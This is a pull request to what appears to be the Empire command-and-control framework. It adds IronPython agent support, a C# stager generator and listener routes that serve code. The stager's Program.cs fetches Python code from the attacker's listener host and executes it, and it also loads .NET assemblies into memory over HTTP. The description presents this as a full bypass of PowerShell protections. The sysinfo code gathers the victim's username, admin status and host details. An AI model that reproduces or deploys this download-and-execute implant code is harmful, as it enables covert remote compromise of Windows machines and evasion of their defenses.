### PR TITLE
IronPython Support [WIP]

### DIFF
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -19,11 +19,15 @@ import imp
 import marshal
 import re
 import shutil
-import pwd
 import socket
 import math
 import stat
-import grp
+import platofrm
+if platform.python_implementation() == 'IronPython':
+    from System import Environment
+else:
+    import pwd
+    import grp
 from stat import S_ISREG, ST_CTIME, ST_MODE
 from os.path import expanduser
 from StringIO import StringIO
@@ -906,9 +910,13 @@ def directory_listing(path):
             permstr = "d{}".format(permstr)
         else:
             permstr = "-{}".format(permstr)
-
-        user = pwd.getpwuid(fstat.st_uid)[0]
-        group = grp.getgrgid(fstat.st_gid)[0]
+        if platform.python_implementation() == 'IronPython':
+            user = Environment.UserName
+            #Needed?
+            group = "Users"
+        else:
+            user = pwd.getpwuid(fstat.st_uid)[0]
+            group = grp.getgrgid(fstat.st_gid)[0]
 
         # Convert file size to MB, KB or Bytes
         if (fstat.st_size > 1024 * 1024):
@@ -961,7 +969,10 @@ def run_command(command, cmdargs=None):
         return "Created directory: {}".format(cmdargs)
 
     elif re.compile("(whoami|getuid)").match(command):
-        return pwd.getpwuid(os.getuid())[0]
+        if platform.python_implementation() == 'IronPython':
+            username = Environment.UserName
+        else:
+            return pwd.getpwuid(os.getuid())[0]
 
     elif re.compile("hostname").match(command):
         return str(socket.gethostname())

--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -22,7 +22,7 @@ import shutil
 import socket
 import math
 import stat
-import platofrm
+import platform
 if platform.python_implementation() == 'IronPython':
     from System import Environment
 else:

--- a/data/agent/stagers/common/get_sysinfo.py
+++ b/data/agent/stagers/common/get_sysinfo.py
@@ -1,6 +1,12 @@
+import platform
+if platform.python_implementation() == 'IronPython':
+    from System.Diagnostics import Process
+    from System import Environment
+    from System.Security.Principal import WindowsIdentity, WindowsPrincipal, WindowsBuiltInRole
+else:
+    import pwd
 import os
 import sys
-import pwd
 import socket
 import subprocess
 
@@ -11,23 +17,36 @@ def get_sysinfo(nonce='00000000'):
     __FAILED_FUNCTION = '[FAILED QUERY]'
 
     try:
-        username = pwd.getpwuid(os.getuid())[0].strip("\\")
+        if platform.python_implementation() == 'IronPython':
+            username =  WindowsIdentity.GetCurrent().User.ToString()
+        else:
+            username = pwd.getpwuid(os.getuid())[0].strip("\\")
     except Exception as e:
         username = __FAILED_FUNCTION
     try:
-        uid = os.popen('id -u').read().strip()
+        if platform.python_implementation() == 'IronPython':
+            uid =  WindowsIdentity.GetCurrent().User.ToString()
+        else:
+            uid = os.popen('id -u').read().strip()
     except Exception as e:
         uid = __FAILED_FUNCTION
     try:
-        highIntegrity = "True" if (uid == "0") else False
+        if platform.python_implementation() == 'IronPython':
+            highIntegrity = WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)
+        else:
+            highIntegrity = "True" if (uid == "0") else False
     except Exception as e:
         highIntegrity = __FAILED_FUNCTION
     try:
-        osDetails = os.uname()
+       if platform.python_implementation() != 'IronPython':
+           osDetails = os.uname()
     except Exception as e:
         osDetails = __FAILED_FUNCTION
     try:
-        hostname = osDetails[1]
+        if platform.python_implementation() == 'IronPython':
+            hostname = Environment.MachineName
+        else:
+            hostname = osDetails[1]
     except Exception as e:
         hostname = __FAILED_FUNCTION
     try:
@@ -38,11 +57,17 @@ def get_sysinfo(nonce='00000000'):
         except Exception as e1:
             internalIP = __FAILED_FUNCTION
     try:
-        osDetails = ",".join(osDetails)
+        if platform.python_implementation() == 'IronPython':
+            osDetails = Environment.OSVersion.ToString()
+        else:
+            osDetails = ",".join(osDetails)
     except Exception as e:
         osDetails = __FAILED_FUNCTION
     try:
-        processID = os.getpid()
+        if platform.python_implementation() == 'IronPython':
+            processID = Process.GetCurrentProcess().Id
+        else:
+            processID = os.getpid()
     except Exception as e:
         processID = __FAILED_FUNCTION
     try:
@@ -52,13 +77,16 @@ def get_sysinfo(nonce='00000000'):
         pyVersion = __FAILED_FUNCTION
 
     language = 'python'
-    cmd = 'ps %s' % (os.getpid())
-    ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-    out, err = ps.communicate()
-    parts = out.split("\n")
-    if len(parts) > 2:
-        processName = " ".join(parts[1].split()[4:])
+    if platform.python_implementation() == 'IronPython':
+        processName = Process.GetCurrentProcess().ToString()
     else:
-        processName = 'python'
+        cmd = 'ps %s' % (os.getpid())
+        ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+        out, err = ps.communicate()
+        parts = out.split("\n")
+        if len(parts) > 2:
+            processName = " ".join(parts[1].split()[4:])
+        else:
+            processName = 'python'
 
     return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)

--- a/data/agent/stagers/common/get_sysinfo.py
+++ b/data/agent/stagers/common/get_sysinfo.py
@@ -18,7 +18,7 @@ def get_sysinfo(nonce='00000000'):
 
     try:
         if platform.python_implementation() == 'IronPython':
-            username =  WindowsIdentity.GetCurrent().User.ToString()
+            username =  Environment.UserName
         else:
             username = pwd.getpwuid(os.getuid())[0].strip("\\")
     except Exception as e:

--- a/data/misc/IPYcSharpTemplateResources/cmd.sln
+++ b/data/misc/IPYcSharpTemplateResources/cmd.sln
@@ -1,0 +1,20 @@
+﻿
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2012
+# SharpDevelop 5.1
+VisualStudioVersion = 12.0.20827.3
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "cmd", "cmd\cmd.csproj", "{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+EndGlobal

--- a/data/misc/IPYcSharpTemplateResources/cmd/Program.cs
+++ b/data/misc/IPYcSharpTemplateResources/cmd/Program.cs
@@ -1,0 +1,28 @@
+﻿using System;
+using System.Reflection;
+using System.Net;
+using IronPython.Hosting;
+using Microsoft.Scripting;
+using IronPython.Modules;
+
+namespace cmd
+{
+	class Program
+	{
+		static Program()
+        {
+			AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(OnResolveAssembly);
+		}
+        public static void Main(string[] args)
+		{
+            var engine = Python.CreateEngine();
+            engine.Execute("h = 'LISTENERHOST';from System.Net import WebClient;exec(WebClient().DownloadString(h+'/download/importer'));add_remote_repo(h + '/download/stdlib/');STAGER");
+		}
+        private static Assembly OnResolveAssembly(object sender, ResolveEventArgs args)
+        {
+            string name = args.Name.Substring(0, args.Name.IndexOf(','));
+            WebClient wc = new WebClient();
+            return Assembly.Load(wc.DownloadData("LISTENERHOST/download/45/" + name + ".dll"));
+		}
+    }
+}

--- a/data/misc/IPYcSharpTemplateResources/cmd/Properties/AssemblyInfo.cs
+++ b/data/misc/IPYcSharpTemplateResources/cmd/Properties/AssemblyInfo.cs
@@ -1,0 +1,31 @@
+﻿#region Using directives
+
+using System;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+#endregion
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("cmd")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("cmd")]
+[assembly: AssemblyCopyright("Copyright 2018")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// This sets the default COM visibility of types in the assembly to invisible.
+// If you need to expose a type to COM, use [ComVisible(true)] on that type.
+[assembly: ComVisible(false)]
+
+// The assembly version has following format :
+//
+// Major.Minor.Build.Revision
+//
+// You can specify all the values or you can use the default the Revision and 
+// Build Numbers by using the '*' as shown below:
+[assembly: AssemblyVersion("1.0.*")]

--- a/data/misc/IPYcSharpTemplateResources/cmd/app.config
+++ b/data/misc/IPYcSharpTemplateResources/cmd/app.config
@@ -1,0 +1,6 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+	<startup>
+		<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
+	</startup>
+</configuration>

--- a/data/misc/IPYcSharpTemplateResources/cmd/cmd.csproj
+++ b/data/misc/IPYcSharpTemplateResources/cmd/cmd.csproj
@@ -1,0 +1,57 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" DefaultTargets="Build">
+  <PropertyGroup>
+    <ProjectGuid>{17E4F716-E93B-42BF-B1A3-E24A46FE4CCD}</ProjectGuid>
+    <ProjectTypeGuids>{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>cmd</RootNamespace>
+    <AssemblyName>cmd</AssemblyName>
+    <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
+    <AppDesignerFolder>Properties</AppDesignerFolder>
+    <TargetFrameworkProfile />
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Platform)' == 'AnyCPU' ">
+    <PlatformTarget>x86</PlatformTarget>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)' == 'Debug' ">
+    <OutputPath>bin\Debug\</OutputPath>
+    <DebugSymbols>True</DebugSymbols>
+    <DebugType>Full</DebugType>
+    <Optimize>False</Optimize>
+    <CheckForOverflowUnderflow>True</CheckForOverflowUnderflow>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)' == 'Release' ">
+    <OutputPath>bin\Release\</OutputPath>
+    <DebugSymbols>False</DebugSymbols>
+    <DebugType>None</DebugType>
+    <Optimize>True</Optimize>
+    <CheckForOverflowUnderflow>False</CheckForOverflowUnderflow>
+    <DefineConstants>TRACE</DefineConstants>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="IronPython">
+      <HintPath>IronPython.dll</HintPath>
+      <Private>False</Private>
+    </Reference>
+    <Reference Include="IronPython.Modules">
+      <HintPath>IronPython.Modules.dll</HintPath>
+      <Private>False</Private>
+    </Reference>
+    <Reference Include="Microsoft.Scripting">
+      <HintPath>Microsoft.Scripting.dll</HintPath>
+      <Private>False</Private>
+    </Reference>
+    <Reference Include="System" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="app.config" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>

--- a/data/misc/IronPython/httpimport.py
+++ b/data/misc/IronPython/httpimport.py
@@ -100,12 +100,7 @@ def add_remote_repo(base_url):
     sys.meta_path.insert(0, importer)
     return importer
 
-#def add_remote_repo(base_url):
-#    importer = HttpImporter(modules, base_url)
-#    sys.meta_path.insert(0, importer)
-#    return importer
-
-
+#This is a hack. Imports built-in modules not present in the standard library
 for x in sys.builtin_module_names:
     __import__(x)
 

--- a/data/misc/IronPython/httpimport.py
+++ b/data/misc/IronPython/httpimport.py
@@ -1,0 +1,111 @@
+#heavily adapated from github.com/operatorequals/httpimport by John Torakis aka operatorequals
+'''
+Copyright 2017 John Torakis
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+'''
+
+import imp
+import sys
+from System.Net import WebClient
+
+class HttpImporter(object):
+    def __init__(self, base_url):
+        self.base_url = base_url
+    def find_module(self, fullname, path=None):
+        try:
+            loader = imp.find_module(fullname, path)
+            return None
+        except ImportError:
+            pass
+        if fullname.split('.').count(fullname.split('.')[-1]) > 1:
+            return None
+
+        return self
+
+    def load_module(self, name):
+
+        imp.acquire_lock()
+        if name in sys.modules:
+            imp.release_lock()
+            return sys.modules[name]
+
+        if name.split('.')[-1] in sys.modules:
+            imp.release_lock()
+            return sys.modules[name.split('.')[-1]]
+
+        if name in sys.builtin_module_names:
+            imp.find_module(name)
+            imp.load_module(name)
+            imp.release_lock()
+            return
+
+        name = name.split('.')[-1]
+
+        #TODO:
+        #Dealing with stuff not actually in iPy
+        if name == "strop" or name == "_hashlib" or name == "nt" or name == "fcntl" or name == "posix" or name == "org" or name == "termios" or name == "msvcrt" or name == "EasyDialogs" or name == "pwd" or name == "grp":
+            return
+        module_url = self.base_url + '%s.py' % name.replace('.', '/')
+        #TODO:
+        #Dealing with weird stuff that happens when packages are needed
+        if name == "aliases" or name == "hex_codec":
+            module_url = self.base_url + 'encodings/%s.py' % name.replace('.', '/')
+        if name == "wintypes" or name == "util" or name == "_endian" or name == "ctypes":
+            module_url = self.base_url + 'ctypes/%s.py' % name.replace('.', '/')
+        package_url = self.base_url + '%s/__init__.py' % name.replace('.', '/')
+        final_url = None
+        final_src = None
+
+        wc = WebClient()
+
+        try:
+            final_src = wc.DownloadString(module_url)
+            final_url = module_url
+        except:
+            pass
+        if final_src is None:
+            try:
+                final_url = package_url
+                package_src = wc.DownloadString(package_url)
+                final_src = package_src
+            except IOError as e:
+                module_src = None
+                imp.release_lock()
+                return None
+
+        mod = imp.new_module(name)
+        mod.__loader__ = self
+        mod.__file__ = final_url
+        mod.__package__ = name.split('.')[0]
+        mod.__path__ = ['/'.join(mod.__file__.split('/')[:-1]) + '/']
+        sys.modules[name] = mod
+        exec(final_src, mod.__dict__)
+        imp.release_lock()
+        return mod
+
+
+def add_remote_repo(base_url):
+    importer = HttpImporter(base_url)
+    sys.meta_path.insert(0, importer)
+    return importer
+
+#def add_remote_repo(base_url):
+#    importer = HttpImporter(modules, base_url)
+#    sys.meta_path.insert(0, importer)
+#    return importer
+
+
+for x in sys.builtin_module_names:
+    __import__(x)
+

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -10,7 +10,7 @@ import copy
 import json
 import sys
 from pydispatch import dispatcher
-from flask import Flask, request, make_response, send_from_directory
+from flask import Flask, request, make_response, send_from_directory, send_file
 # Empire imports
 from lib.common import helpers
 from lib.common import agents
@@ -933,6 +933,26 @@ def send_message(packets=None):
                 return launcher
             else:
                 return make_response(self.default_response(), 404)
+
+        @app.route('/download/importer')
+        def send_importer():
+            return send_file('../../data/misc/IronPython/httpimport.py')
+
+        @app.route('/download/45/<filename>')
+        def send_assemblies45(filename):
+            return send_from_directory('../../data/misc/IronPython/net45/',filename)
+
+        @app.route('/download/40/<filename>')
+        def send_assemblies40(filename):
+            return send_from_directory('../../data/misc/IronPython/net40/',filename)
+
+        @app.route('/download/stdlib/<filename>')
+        def send_ipy(filename):
+            return send_from_directory('../../data/misc/IronPython/Lib/', filename)
+
+        @app.route('/download/stdlib/<folder>/<filename>')
+        def send_ipy_sub(folder,filename):
+            return send_from_directory('../../data/misc/IronPython/Lib/'+folder, filename)
 
         @app.before_request
         def check_ip():

--- a/lib/stagers/windows/ipycsharpexe.py
+++ b/lib/stagers/windows/ipycsharpexe.py
@@ -1,0 +1,97 @@
+from lib.common import helpers
+import shutil
+import os
+
+class Stager:
+
+    def __init__(self, mainMenu, params=[]):
+
+        self.info = {
+            'Name': 'CSharp IronPython Stager',
+
+            'Author': ['@elitest'],
+
+            'Description': ('Generates a C# source zip containing an IronPython environment to execute the Empire stage0 launcher.'),
+
+            'Comments': [
+                ''
+            ]
+        }
+
+        # any options needed by the stager, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Host' : {
+                'Description'   :   'Protocol IP and port that the listener is listening on.',
+                'Required'      :   True,
+                'Value'         :   "http://%s:%s" % (helpers.lhost(), 80)
+            },
+            'Listener' : {
+                'Description'   :   'Listener to generate stager for.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'OutFile' : {
+                'Description'   :   'File to output zip to.',
+                'Required'      :   True,
+                'Value'         :   '/tmp/launcher.src'
+            },
+            'SafeChecks' : {
+                'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
+                'Required'      :   True,
+                'Value'         :   'False'
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+
+    def generate(self):
+
+        # extract all of our options
+        host = self.options['Host']['Value']
+        listenerName = self.options['Listener']['Value']
+        outfile = self.options['OutFile']['Value']
+        safeChecks = self.options['SafeChecks']['Value']
+        userAgent = self.options['UserAgent']['Value']
+
+        # generate the launcher code
+        if not self.mainMenu.listeners.is_listener_valid(listenerName):
+            # not a valid listener, return nothing for the script
+            print helpers.color("[!] Invalid listener: " + listenerName)
+            return ""
+        else:
+
+            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks)
+            launcher = launcher.strip('echo').strip(' | /usr/bin/python &').strip("\"")
+
+            if launcher == "":
+                print helpers.color("[!] Error in launcher command generation.")
+                return ""
+
+            else:
+                directory = self.mainMenu.installPath + "/data/misc/IPYcSharpTemplateResources/"
+                destdirectory = "/tmp/cmd/"
+
+                shutil.copytree(directory,destdirectory)
+
+                file = open(destdirectory + 'cmd/Program.cs').read()
+                file = file.replace('LISTENERHOST',host)
+                file = file.replace('STAGER',launcher)
+                open(destdirectory + 'cmd/Program.cs','w').write(file)
+                shutil.make_archive(outfile,'zip',destdirectory)
+                shutil.rmtree(destdirectory)
+                return "[*] Stager output written out to: "+outfile+".zip"

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -177,6 +177,10 @@ chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/loca
 # Downloading IronPython dependencies
 wget https://github.com/IronLanguages/ironpython2/releases/download/ipy-2.7.8/IronPython.2.7.8.zip
 unzip -o IronPython.2.7.8.zip -d ../data/misc/IronPython
+cp ../data/misc/IronPython/net45/IronPython.dll ../data/misc/IPYcSharpTemplateResources/cmd
+cp ../data/misc/IronPython/net45/IronPython.Modules.dll ../data/misc/IPYcSharpTemplateResources/cmd
+cp ../data/misc/IronPython/net45/Microsoft.Dynamic.dll ../data/misc/IPYcSharpTemplateResources/cmd
+cp ../data/misc/IronPython/net45/Microsoft.Scripting.dll ../data/misc/IPYcSharpTemplateResources/cmd
 rm IronPython.2.7.8.zip
 
 

--- a/setup/install.sh
+++ b/setup/install.sh
@@ -174,6 +174,12 @@ if uname | grep -q "Linux"; then
 fi
 chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/local/bin/.
 
+# Downloading IronPython dependencies
+wget https://github.com/IronLanguages/ironpython2/releases/download/ipy-2.7.8/IronPython.2.7.8.zip
+unzip -o IronPython.2.7.8.zip -d ../data/misc/IronPython
+rm IronPython.2.7.8.zip
+
+
 # set up the database schema
 python ./setup_database.py
 


### PR DESCRIPTION
So I hope I have done something interesting and potentially useful.  This is an initial PR to solicit feedback and we can potentially build on it from there.  This PR would bring the capability to run python stagers on Windows hosts using nimble executables just a few kilobytes in size([demo](https://twitter.com/elitest/status/1049333047089352715)), allowing for a full bypass of PowerShell protections while still being able to write dynamic .Net aware code.  The flavor of Python that I have chosen for this is IronPython, a former MS project that hooks python up to the .Net CLR.  What this means is that you can choose to write Python code very similar or in some cases identical to CPython or write Python code very similar to other .Net languages like PowerShell or C#.

The architecture that I have built hosts everything needed for the IronPython environment on the listener and the stager downloads these resources over http(s).  The executables pull down the necessary .Net assemblies, which are not included in this PR but are slotted in place by install.sh, the executing file then loads the assemblies directly into memory using a modification to a trick that [Jeffrey Richter developed](https://blogs.msdn.microsoft.com/microsoft_press/2010/02/03/jeffrey-richter-excerpt-2-from-clr-via-c-third-edition/).  Costura, just to give you an example of this, is a C# assembly packing tool that uses this technique to bundle the assemblies as resources within the exe, I adapted this approach to load the assemblies over http(s) from the listener instead.

The next step is setting up the standard library, which is again slotted in by install.sh.  This also is served by the listener and each library and dependency is downloaded on the fly by the httpimport.py file, which is based off of [httpimport project](https://github.com/operatorequals/httpimport) by operatorequals.  I have heavily modified it for my purposes and to work with IronPython instead of CPython(urllib2 is not available in our constrained environment until after it is loaded).  This code definitely has the highest concentration of ugly hacks, but I think they are probably solvable.

This is all done by a C# binary that is the "stager", which basically sets this all up, and wraps the python stager code and at run time executes it.

There are several steps that need to be done before anyone should use this outside of a test environment.  This is barely out of the PoC stages.
- [ ] Testing and better error checking.  Testing also needs to happen on the normal python side of things 
- [ ] Fix built-in commands.  I don't think 'ps' even works, but sysinfo does.
- [ ] Build more modules.  Even porting existing PowerShell modules to IronPython. 
- [ ] Potentially differentiate the agent/stager code so that it can be written in pure .Net, eliminating the StdLib dependency.
- [ ] Fix .gitignore
- [ ] Other stuff from your feedback.